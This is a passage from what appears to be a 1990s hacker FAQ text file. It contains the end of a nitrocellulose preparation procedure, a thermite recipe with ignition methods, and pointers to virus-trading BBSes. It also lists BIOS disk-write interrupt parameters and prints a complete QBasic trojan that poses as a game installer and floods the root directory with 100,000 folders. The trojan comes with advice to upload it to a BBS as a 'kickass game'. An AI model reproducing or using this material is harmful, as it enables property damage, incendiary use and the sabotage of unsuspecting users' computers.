  721.            4.  Allow it to soak for EXACTLY three(3) minutes.
  722.            5.  Remove the nitrocellulose.
  723.            6.  Put the nitrocellulose into a beaker of distilled
  724.                water to wash it in.
  725.            7.  Allow the material to dry.
  726.            8.  Re-wash it.
  727.            9.  Once neutral(acid/base) it can be dried and stored.
  728.  
  729. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  730.  
  731. WHAT IS THERMITE AND HOW DO I MAKE IT?
  732. Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
  733. and can be used to burn through most anything.
  734.  
  735. Materials: powdered aluminum, powdered iron oxide
  736.  
  737. Procedure: mix the two powders together as evenly as possible
  738.  
  739. Ignition:  thermite is difficult to ignite but these work
  740.             a) mix a small amount of potassium chlorate into the
  741.                thermite mixture and ignite with a few drops of
  742.                sulfuric acid
  743.             b) magnesium strip or 'sparkler' stuck into the powder
  744.                which is then lit as a fuse
  745.  
  746. =====================================================================
  747. V. Infection
  748.      (Virii, Trojans, Worms and other creepy crawlies)
  749.  
  750. WHERE CAN I GET SOME VIRII?
  751. The Virus eXchange BBS in Bulgaria.  [number not available - :( ]
  752. Problem:  They demand a virus they don't have in their archives to
  753. let you in.  Good luck finding one.  The best way is to write one,
  754. even if it's in BASIC. It'll probably get you in.  They have
  755. THOUSANDS of virii.  IBM, Mac, Amiga, ... And they accept 2400 bps
  756. from what I know! For more info, gopher to wiretap.spies.com and dig
  757. around in their online library under technical info.
  758.  
  759. There are alot of places in the US to get virii too:
  760. The Hell Pit in Chicago has over 1500, and they don't accept the
  761. lame stuff like the ones written in basic, so they're all good ones.
  762.  
  763. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  764.  
  765. INTS USED:
  766. (from Belisarius)
  767. You want Int 18h, AH=03h,
  768. Al==Num sectors to write
  769. BX==offset of pointer to buffer
  770. CH=cylinder Number
  771. Cl=sector number
  772. DX=head number
  773. Dl=drive numbers
  774. ES=segment of pointer with buffer
  775.  
  776. for CH=it's the low 8 bits of 10 bit cylinder number,
  777. for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
  778.                                    0-5=sector number.
  779. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
  780. AH=status, AL=number of sectors written flags, carry set if an error.
  781.  
  782. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  783.  
  784. SAMPLE OF A TROJAN
  785. (from Spear)
  786.  
  787. This is a little trojan I wrote in Qbasic 4.5  It's a bitch!
  788.  
  789. REM bitch by Spear
  790. color 14,0
  791. print"installing datafiles...  Please wait..."
  792. print"This may take up to 20 minutes, depending on your computer..."
  793. shell "cd\"
  794. for a = 1 to 100000
  795. a$=str$(a)
  796. c$="md" + a$ + ".hee"
  797. shell c$
  798. next a
  799. cls
  800. print"Cybermattixx Version 1.0 is now installed on your system..."
  801. print"Have a shitty day!"
  802. print " ?AM?"
  803. print
  804. input "Hit ENTER To REBOOT your System now!";a$
  805. shell "boot.com"
  806.  
  807. How to use it?
  808. This can pose as the installation program for a game. This means that
  809. when you upload it to a BBS or something, and post that it is a
  810. kickass game, people will download it and try to install it on their
  811. computers!
  812.  
  813. What does it do?
  814. This program changes directory to the root and makes 100000 dirs in
  815. the root.  You cannot use deltree to wipe them out in one chunk and
  816. you CANNOT get rid of them without doing reverse engineering on the
  817. program, ie. rd instead of md.  To get rid of them any other way you
  818. would have to format c: or d:
  819.  
  820. -=-=-=-=-=-=-=-=-=-=-=-=-=- END of HAQ1.07/1 -=-=-=-=-=-=-=-=-=-=-=--=
  821.  
  822.                              -=*( Prophet )*=-
  823.     ____                   __         __ 
  824.    / __ \_________  ____  / /_  ___  / /_   The Truth Is Out There...
  825.   / /_/ / ___/ __ \/ __ \/ __ \/ _ \/ __/
  826.  / ____/ /  / /_/ / /_/ / / / /  __/ /_     Trust No-One...
  827. /_/   /_/   \____/ .___/_/ /_/\___/\__/  
  828.                 /_/                         Do Not Fear The Reaper,
  829. prophet@illumini.demon.co.uk                Fear Your God-Damn Government
  830.